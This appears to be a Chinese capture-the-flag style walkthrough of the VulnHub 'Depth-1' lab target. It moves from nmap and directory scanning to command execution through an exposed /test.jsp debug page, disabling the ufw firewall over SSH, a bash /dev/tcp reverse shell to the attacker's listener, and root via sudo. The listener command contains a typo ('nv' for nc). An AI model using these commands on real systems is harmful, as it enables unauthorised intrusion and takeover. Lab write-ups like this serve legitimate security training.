靶机下载地址：

https://www.vulnhub.com/entry/depth-1,213/https://www.vulnhub.com/entry/depth-1,213/

1. 主机发现+端口扫描+目录扫描

1.1. 主机发现

nmap -sn 192.168.43.0/24|grep -B 2 '08:00:27:08:B4:07'

1.2. 端口扫描

nmap -p- 192.168.43.112

1.3. 目录扫描

dirb http://192.168.43.112:8080

2. 8080端口

2.1. 打洞寻找漏洞

1.老规矩逐个点击页面功能点，查看可以利用的功能点。 -> 点击manager webapp跳转至一个登录框

2.拼接dirb扫出的目录，不大行 -> 试试dirsearch目录扫描，扫出一个jsp文件，可能是dirb的字典不大行

python3 dirsearch.py -u http://192.168.43.112:8080/

3.拼接/test.jsp，页面是一个debug页面 -> 输入根据页面提示，输入ls -la /home，发现root和bill两个用户

ls -la /home

4.可以执行命令，但是尝试反弹shell失败，看一下进程，发现有ssh，之前没有扫到，可能是因为防火墙 -> 查看/etc下，防火墙是存在的 -> 关闭防火墙

ps aux #查看进程
ls -la /etc #寻找防火墙
ssh bill@localhost sudo ufw disable # 关闭防火墙

2.2. GetShell

1.打开kali监听

nv -lvnp 4444

2.执行反弹shell语句 -> 成功反弹

ssh bill@localhost bash -i >& /dev/tcp/192.168.43.178/4444 0>&1

3. 权限提升

1.查看当前用户权限 -> 发现是all全部

sudo -l

2.直接提权 -> 成功

sudo su